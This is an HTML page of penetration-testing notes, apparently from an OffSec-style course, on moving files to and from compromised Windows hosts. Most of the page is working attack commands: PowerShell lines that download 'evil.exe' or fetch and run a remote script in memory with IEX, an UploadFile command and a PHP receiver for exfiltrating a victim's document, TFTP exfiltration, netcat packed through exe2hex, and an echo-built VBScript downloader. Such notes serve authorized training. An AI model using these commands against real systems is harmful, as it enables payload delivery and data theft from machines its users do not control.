<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>16 File Transfers</title>
</head><body><b>Auto Configure FTPD server:<br/>
----------------------------------------------<br/>
</b>sudo apt update &amp;&amp; sudo apt install pure-ftpd &nbsp;<br/>
<br/>
#!/bin/bash <br/>
groupadd ftpgroup <br/>
useradd -g ftpgroup -d /dev/null -s /etc ftpuser <br/>
pure-pw useradd offsec -u ftpuser -d /ftphome <br/>
pure-pw mkdb <br/>
cd /etc/pure-ftpd/auth/ <br/>
ln -s ../conf/PureDB 60pdb <br/>
mkdir -p /ftphome <br/>
chown -R ftpuser:ftpgroup /ftphome/ <br/>
systemctl restart pure-ftpd &nbsp;<br/>
<br/>
<br/>
<br/>
<b>Windows Hosts FTP Non-Interactive:</b><br/>
---------------------------------------------------------------------------------<br/>
echo open HOST_IP 21 &gt; ftp.txt<br/>
echo USER offsec&gt;&gt; ftp.txt<br/>
echo lab &gt;&gt; ftp.txt<br/>
echo bin &gt;&gt; ftp.txt<br/>
echo GET file.exe &gt;&gt; ftp.txt<br/>
echo bye &gt;&gt; ftp.txt<br/>
<br/>
ftp -v -n -s:ftp.txt<br/>
<br/>
<b>&nbsp;-v</b>&nbsp;to suppress any returned output, <br/>
<b>&nbsp;-n</b>&nbsp;to suppresses automatic login<br/>
<b>&nbsp;-s</b>&nbsp;to indicate the name of our command file &nbsp;<br/>
<br/>
<br/>
<br/>
<b>Transfer Files to windows Host using Powershell:<br/>
----------------------------------------------------------------------------------<br/>
</b>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http:/ /10.11.0.4/evil.exe', 'new-exploit.exe') &nbsp;<br/>
<br/>
<b><br/>
Transfer Files to windows Host using Powershell: [download and execute a PowerShell script without saving it to disk]<br/>
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br/>
</b>If we want to download and execute a PowerShell script without saving it to disk, we can once again use the System.Net.Webclient class. This is done by combining the DownloadString method with the Invoke-Expression cmdlet (IEX). &nbsp;<br/>
<br/>
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString(' http://10.11.0.4/helloworld.ps1') &nbsp;<br/>
<b><br/>
<br/>
Exfilterating Data from The Windows Host:<br/>
--------------------------------------------------------------------<br/>
</b>if outbound HTTP traffic is allowed, we can use the System.Net.WebClient PowerShell class to upload data to our Kali machine through an HTTP POST request &nbsp;<br/>
To do this, we can create the following PHP script and save it as upload.php in our Kali webroot directory, /var/www/html: <br/>
<b><br/>
<br/>
</b><i>&lt;?php<br/>
$uploaddir = '/var/www/uploads/';<br/>
$uploadfile = $uploaddir . $_FILES['file']['name'];<br/>
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)<br/>
?&gt;<br/>
</i><br/>
Next, we must create the uploads folder and modify its permissions, granting the www-data user ownership and subsequent write permissions. &nbsp;<b><br/>
</b><b><br/>
</b>With Apache and the PHP script ready to receive our file, we move to the compromised Windows host and invoke the UploadFile method from the System.Net.WebClient class <br/>
to upload the document we want to exfiltrate, in this case, a file named important.docx &nbsp;<br/>
<br/>
<i>powershell (New-Object System.Net.WebClient).UploadFile('http://10.11 .0.4/upload.php', 'important.docx') &nbsp;</i><b><br/>
</b><b><br/>
<br/>
Windows Downloads with exe2hex and PowerShell:<br/>
-------------------------------------------------------------------------------------<br/>
</b><b>Compress: </b>upx -9 nc.exe &nbsp;<br/>
<b>Size Check:</b>&nbsp;ls -lh nc.exe &nbsp;<b><br/>
</b><b>Hex Conversion: </b>&nbsp;exe2hex -x nc.exe -p nc.cmd &nbsp;<br/>
<b>Copy resulted hex to Client CMD</b><br/>
<b>Client-Side generated Powershell Execution.</b><br/>
<b><br/>
<br/>
Uploading Files with TFTP :<br/>
----------------------------------------------------------<br/>
</b>TFTP400 is a UDP-based file transfer protocol and is often restricted by corporate egress firewall rules, During a penetration test, we can use TFTP to transfer files from older Windows operating systems up to Windows XP and 2003. This is a terrific tool for non-interactive file transfer, but it is not installed by default on systems running Windows 7, Windows 2008, and newer. &nbsp;<br/>
For these reasons, TFTP is not an ideal file transfer protocol for most situations, but under the right circumstances, it has its advantages &nbsp;<br/>
<b><br/>
Attaker Side:<br/>
</b>sudo apt update &amp;&amp; sudo apt install atftp<br/>
sudo mkdir /tftp<br/>
sudo chown nobody: /tftp<br/>
sudo atftpd --daemon --port 69 /tftp<b><br/>
</b><b><br/>
Victim Side:<br/>
</b>C:\Users\Offsec&gt; tftp -i 10.11.0.4 put important.docx &nbsp;<br/>
<b><br/>
<br/>
Transfer Files to windows Host using VBS:<br/>
----------------------------------------------------------------------------------<br/>
</b>&nbsp;cscript wget.vbs http://10.11.0.4/evil.exe evil.exe &nbsp;<b><br/>
</b><b>----------------------------------------------------------------------------------</b><br/>
echo strUrl = WScript.Arguments.Item(0) &gt; wget.vbs<br/>
echo StrFile = WScript.Arguments.Item(1) &gt;&gt; wget.vbs<br/>
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 &gt;&gt; wget.vbs<br/>
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 &gt;&gt; wget.vbs<br/>
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 &gt;&gt; wget.vbs<br/>
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 &gt;&gt; wget.vbs<br/>
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts &gt;&gt; wget.vbs<br/>
echo Err.Clear &gt;&gt; wget.vbs<br/>
echo Set http = Nothing &gt;&gt; wget.vbs<br/>
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") &gt;&gt; wget.vbs<br/>
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") &gt;&gt; wge<br/>
t.vbs<br/>
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") &gt;&gt; wget.<br/>
vbs<br/>
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") &gt;&gt; wget.vbs<br/>
echo http.Open "GET", strURL, False &gt;&gt; wget.vbs<br/>
echo http.Send &gt;&gt; wget.vbs<br/>
echo varByteArray = http.ResponseBody &gt;&gt; wget.vbs<br/>
echo Set http = Nothing &gt;&gt; wget.vbs<br/>
echo Set fs = CreateObject("Scripting.FileSystemObject") &gt;&gt; wget.vbs<br/>
echo Set ts = fs.CreateTextFile(StrFile, True) &gt;&gt; wget.vbs<br/>
echo strData = "" &gt;&gt; wget.vbs<br/>
echo strBuffer = "" &gt;&gt; wget.vbs<br/>
echo For lngCounter = 0 to UBound(varByteArray) &gt;&gt; wget.vbs<br/>
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) &gt;&gt; wget.vbs<br/>
echo Next &gt;&gt; wget.vbs<br/>
echo ts.Close &gt;&gt; wget.vbs</body></html>